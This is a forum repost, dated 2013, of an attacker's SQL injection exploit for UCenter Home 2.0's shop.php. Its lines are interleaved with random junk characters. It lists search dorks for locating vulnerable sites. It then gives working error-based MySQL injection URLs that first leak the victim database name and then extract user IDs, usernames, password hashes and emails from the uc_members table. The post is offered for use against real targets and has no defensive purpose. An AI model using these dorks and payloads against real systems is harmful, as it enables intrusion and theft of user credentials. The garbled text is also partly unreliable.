, L$ b& F! {2 b# l% {
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
0 t' e* P# X, Z; R k; A+ T8 g6 h) F) Z, {8 L0 \
6 s. ]# g. ~' `; s& Z0 H; g& g, {8 a2 h7 k% j% ]
*/ Author : KnocKout 0 }& x6 I5 a% O4 _: S7 `
! x% j6 ~1 a1 u( c' G, ~
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
6 _$ N# O/ H, V6 k* b: q
* U$ f: P& k: x8 Y$ z5 b* G*/ Contact: knockoutr@msn.com 8 `8 A3 U9 e' n- u, q# T
9 Z/ T( Y2 i( ?4 t) z
*/ Cyber-Warrior.org/CWKnocKout Y( ]* f- H% B' l8 @+ W
/ z \" w6 l2 c3 g
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 C8 j2 Y& Q9 q8 u u
0 p. ?$ c: e% v" O M7 _Script : UCenter Home
8 ]3 S5 |, s( e F5 X
1 f0 d/ k5 \- V y& PVersion : 2.0 7 c' N. }" }9 |9 \! T7 S
) I) K. N+ s/ H+ E
Script HomePage : http://u.discuz.net/ 3 m3 I, M2 q2 \" |0 P; ^: [. ]
, B- x( Y# L' G, @7 e4 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) p0 V- u* N9 }. ?/ `! r! }* B2 V1 L& m
Dork : Powered by UCenter inurl:shop.php?ac=view
/ Y: t8 @4 A/ ^: U0 v' g: }; B* z2 n2 m6 b0 F
Dork 2 : inurl:shop.php?ac=view&shopid=
+ S- ~. o, W2 k& `9 n+ V. C2 I9 Q4 }6 Z2 c; b4 ?1 t! F
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ; `( a( C; ?. \" R
8 S: l$ { ~& ~: J: F/ c0 k: eVuln file : Shop.php ( E' _ w' h+ G6 f9 W& t
}* M5 f: D/ V/ p( Ovalue's : (?)ac=view&shopid= 0 C" S6 x6 `/ _7 W
c2 [3 m3 u" j4 ]0 a9 q: A5 q" g+ oVulnerable Style : SQL Injection (MySQL Error Based)
3 o5 c/ O1 p% F/ o9 W7 j
: z0 M5 d( D' m7 a: uNeed Metarials : Hex Conversion ) Z4 h1 I$ t! U5 V' K' T
( l8 r+ C& y/ k4 i1 u6 Z7 `) v
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 t B" t ~- U! ^) l/ e
; v# G) b7 G& [) D/ SYour Need victim Database name. 2 m+ ?: D) K, P, ^; j
1 V0 R/ n, P5 @( \6 B* c
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 5 t. g% H' t# F! e0 b9 M: r% N
" {& |5 J2 @! [- ?6 p.. 6 M- d; X! F1 t9 e! U
% t3 ]; Y ?! w" F# I8 ~7 S8 X; F: R
DB : Okey. 5 O6 | {0 O/ N( D$ O- _
+ r$ K4 K) o) P+ Cyour edit DB `[TARGET DB NAME]`
0 \3 {2 i) X% t7 j- o, Z, ]8 Y: R1 T" l7 [
Example : 'hiwir1_ucenter' 8 A4 l$ u0 Q# ]0 T7 T; e: {& x
5 w# u+ o( m$ D' `
Edit : Okey.
# @2 S& Q) q( J
+ ?% q! V* i0 m! L) T, b" I: o6 QYour use Hex conversion. And edit Your SQL Injection Exploit.. / t1 x& P1 c+ k0 u. D" u0 m
* q8 y( v2 K) ~% _2 ~1 c6 q) {4 ?- o
- v( d% E' j" x! z
% u5 b0 k# q* O1 G. RExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 2 `- C: |4 G! X; }3 f8 i: A2 z2 d
|
发表于 2013-2-27 21:31:31
收藏
支持
反对